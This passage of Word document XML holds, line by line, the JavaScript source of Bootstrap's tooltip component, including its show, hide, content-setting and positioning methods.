        <w:t xml:space="preserve">          context._enter(null, context);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          context._leave(null, context);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if ($(this.getTipElement()).hasClass(ClassName$6.SHOW)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          this._leave(null, this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/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this._enter(null, this);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clearTimeout(this._timeout);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $.removeData(this.element, this.constructor.DATA_KEY);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this.element).off(this.constructor.EVENT_KEY);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      $(this.element).closest('.modal').off('hide.bs.modal');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this.tip) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this.tip).remove();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this._isEnabled = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._timeout = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._hoverState = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._activeTrigger = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._popper !== null) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._popper.destroy();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this._popper = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.element = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.config = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.tip = null;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_proto.show = function show()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if ($(this.element).css('display') === 'none') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        throw new Error('Please use show on visible elements');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showEvent = $.Event(this.constructor.Event.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this.isWithContent() &amp;&amp; this._isEnabled) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this.element).trigger(showEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var shadowRoot = Util.findShadowRoot(this.element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var isInTheDom = $.contains(shadowRoot !== null ? shadowRoot : this.element.ownerDocument.documentElement, this.element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (showEvent.isDefaultPrevented() || !isInTheDom) {</w:t>
      </w:r>
    </w:p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tip = this.getTipElement();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var tipId = Util.getUID(this.constructor.NAME);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        tip.setAttribute('id', tipId);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.element.setAttribute('aria-describedby', tipId);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.setContent();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (this.config.animation) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(tip).addClass(ClassName$6.FADE);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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        var placement = typeof this.config.placement === 'function' ? this.config.placement.call(this, tip, this.element) : this.config.placement;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var attachment = this._getAttachment(placement);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.addAttachmentClass(attachment);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var container = this._getContainer();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(tip).data(this.constructor.DATA_KEY, this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (!$.contains(this.element.ownerDocument.documentElement, this.tip)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(tip).appendTo(container);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$(this.element).trigger(this.constructor.Event.INSERTED);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._popper = new Popper(this.element, tip, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          placement: attachment,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          modifiers: {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            offset: this._getOffset(),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            flip: {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">              behavior: this.config.fallbackPlacement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            arrow: {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">              element: Selector$6.ARROW</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            preventOverflow: {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">              boundariesElement: this.config.boundary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          onCreate: function onCreate(data) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            if (data.originalPlacement !== data.placement) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">              _this._handlePopperPlacementChange(data);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          onUpdate: function onUpdate(data) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            return _this._handlePopperPlacementChange(data);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$(tip).addClass(ClassName$6.SHOW); // If this is a touch-enabled device we add extra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // empty mouseover listeners to the body's immediate children;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // only needed because of broken event delegation on iOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // https://www.quirksmode.org/blog/archives/2014/02/mouse_event_bub.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if ('ontouchstart' in document.documentElement) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(document.body).children().on('mouseover', null, $.noop);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var complete = function complete() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (_this.config.animation) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            _this._fixTransition();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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var prevHoverState = _this._hoverState;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this._hoverState = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(_this.element).trigger(_this.constructor.Event.SHOWN);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (prevHoverState === HoverState.OUT) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            _this._leave(null, _this);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};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if ($(this.tip).hasClass(ClassName$6.FADE)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var transitionDuration = Util.getTransitionDurationFromElement(this.tip);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(this.tip).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          complete();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_proto.hide = function hide(callback)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var tip = this.getTipElement();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var hideEvent = $.Event(this.constructor.Event.HIDE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var complete = function complete() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (_this2._hoverState !== HoverState.SHOW &amp;&amp; tip.parentNode) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          tip.parentNode.removeChild(tip);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_this2._cleanTipClass();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        _this2.element.removeAttribute('aria-describedby');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(_this2.element).trigger(_this2.constructor.Event.HIDDEN);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (_this2._popper !== null) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this2._popper.destroy();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(callback) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          callback();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$(this.element).trigger(hideEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (hideEvent.isDefaultPrevented())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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(tip).removeClass(ClassName$6.SHOW); // If this is a touch-enabled device we remove the extra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      // empty mouseover listeners we added for iOS support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if ('ontouchstart' in document.documentElement) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(document.body).children().off('mouseover', null, $.noop);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this._activeTrigger[Trigger.CLICK] = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._activeTrigger[Trigger.FOCUS] = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._activeTrigger[Trigger.HOVER] = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if ($(this.tip).hasClass(ClassName$6.FADE)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var transitionDuration = Util.getTransitionDurationFromElement(tip);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(tip).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);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complete();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this._hoverState = '';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_proto.update = function update() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._popper !== null) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        this._popper.scheduleUpdate();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Protected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_proto.isWithContent = function isWithContent() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return Boolean(this.getTitle());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_proto.addAttachmentClass = function addAttachmentClass(attachment) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this.getTipElement()).addClass(CLASS_PREFIX + "-" + attachment);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_proto.getTipElement = function getTipElement() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.tip = this.tip || $(this.config.template)[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return this.tip;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_proto.setContent = function setContent() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var tip = this.getTipElement();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.setElementContent($(tip.querySelectorAll(Selector$6.TOOLTIP_INNER)), this.getTitle());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(tip).removeClass(ClassName$6.FADE + " " + ClassName$6.SHOW);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_proto.setElementContent = function setElementContent($element, content) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      if (typeof content === 'object' &amp;&amp; (content.nodeType || content.jquery)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // Content is a DOM node or a jQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (this.config.html) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (!$(content).parent().is($element)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            $element.empty().append(content);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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $element.text($(content).text());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(this.config.html) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (this.config.sanitize) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          content = sanitizeHtml(content, this.config.whiteList, this.config.sanitizeFn);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$element.html(content);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$element.text(content);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_proto.getTitle = function getTitle() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      var title = this.element.getAttribute('data-original-title');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!title) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        title = typeof this.config.title === 'function' ? this.config.title.call(this.element) : this.config.title;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title;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_proto._getOffset = function _getOffset() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this3 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var offset = {};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (typeof this.config.offset === 'function') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        offset.fn = function (data) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          data.offsets = _objectSpread({}, data.offsets, _this3.config.offset(data.offsets, _this3.element) || {});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return data;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        };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offset.offset = this.config.offset;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offset;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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_proto._getContainer = function _getContainer() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this.config.container === false) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return document.body;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(Util.isElement(this.config.container)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return $(this.config.container);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$(document).find(this.config.container);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_proto._getAttachment = function _getAttachment(placement) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return AttachmentMap$1[placement.toUpperCase()];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_proto._setListeners = function _setListeners() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this4 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
